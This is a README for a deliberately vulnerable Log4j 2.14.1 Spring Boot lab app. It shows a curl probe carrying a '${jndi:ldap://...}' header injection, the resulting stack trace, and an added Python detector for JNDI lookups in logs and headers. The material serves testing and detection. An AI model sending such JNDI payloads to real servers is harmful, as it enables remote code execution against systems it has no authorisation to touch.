# Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).

It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and JDK 8u191.

## Running the application

Run it:

```
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
```

Build it yourself (you don't need any Java-related tooling):

```
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app
```

## Exploitation

You can confirm the application is vulnerable by running:

```
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
```

You will see the following stack trace in the application logs:

```
2021-12-10 12:43:13,416 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
	at com.sun.jndi.ldap.Connection.<init>(Connection.java:238)
	at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
	at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
	at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2749)
	at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:319)
	at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
	at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
	at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
	at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
	at javax.naming.InitialContext.lookup(InitialContext.java:417)
	at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
```
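The log line above is also a useful detection hook: the following is an added example (not part of this repository) that scans Log4j 2 output for the `JndiManager` "Error looking up JNDI resource" message, extracts the lookup URL, and checks a header value for the `${jndi:` token used in the curl request. The sample log and the regular expressions are constructed here for illustration.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample log: the WARN line from the README's stack trace plus
# one unrelated line, so the scanner can be exercised offline.
SAMPLE_LOG = """\
2021-12-10 12:43:13,416 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
2021-12-10 12:43:14,002 http-nio-8080-exec-2 INFO Request processed
"""

# Log4j 2's JndiManager emits this message when a JNDI lookup fails; the
# bracketed URL is the endpoint the logged string pointed the server at.
JNDI_LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<thread>\S+) (?P<level>\w+) "
    r"Error looking up JNDI resource \[(?P<url>[^\]]+)\]"
)

# The lookup token as it appears in the X-Api-Version header of the curl
# request above. Narrow on purpose: it flags this exact form only.
JNDI_HEADER_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


@dataclass
class JndiHit:
    timestamp: str
    thread: str
    url: str
    scheme: str  # e.g. "ldap"; the part of the URL before the first ':'


def scan_app_log(text: str) -> List[JndiHit]:
    """Return one JndiHit per failed JNDI lookup line in a Log4j 2 log."""
    hits = []
    for line in text.splitlines():
        m = JNDI_LOG_RE.match(line)
        if m:
            url = m.group("url")
            hits.append(JndiHit(m.group("ts"), m.group("thread"),
                                url, url.split(":", 1)[0].lower()))
    return hits


def header_has_jndi_lookup(value: str) -> bool:
    """True if a request header value carries a Log4j JNDI lookup token."""
    return JNDI_HEADER_RE.search(value) is not None


if __name__ == "__main__":
    for hit in scan_app_log(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.thread}: JNDI lookup to {hit.url} ({hit.scheme})")
    print(header_has_jndi_lookup("${jndi:ldap://127.0.0.1/a}"))  # True
    print(header_has_jndi_lookup("1.0"))  # False
```

A failed lookup only appears in the log when the lookup target is unreachable, so the header check is the earlier signal; the log scan confirms that Log4j actually attempted the JNDI connection.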

## Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/